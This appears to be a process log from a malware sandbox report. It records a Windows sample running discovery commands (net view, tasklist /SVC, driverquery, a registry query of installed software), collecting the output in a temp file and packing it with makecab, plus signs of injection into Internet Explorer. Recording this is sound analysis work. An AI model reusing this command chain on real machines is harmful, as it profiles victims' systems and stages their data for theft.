C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1984
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1632
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1668
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1316
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:1488
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:2016
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1224
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:692
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1560
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:1208
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:556
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1720
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:272
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1520
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\82AC.bin1 > C:\Users\Admin\AppData\Local\Temp\82AC.bin & del C:\Users\Admin\AppData\Local\Temp\82AC.bin1"2⤵PID:1432
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\3FA6.bin"2⤵PID:1984
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1372 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:968
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1612
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:904
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:988 CREDAT:209936 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1260
-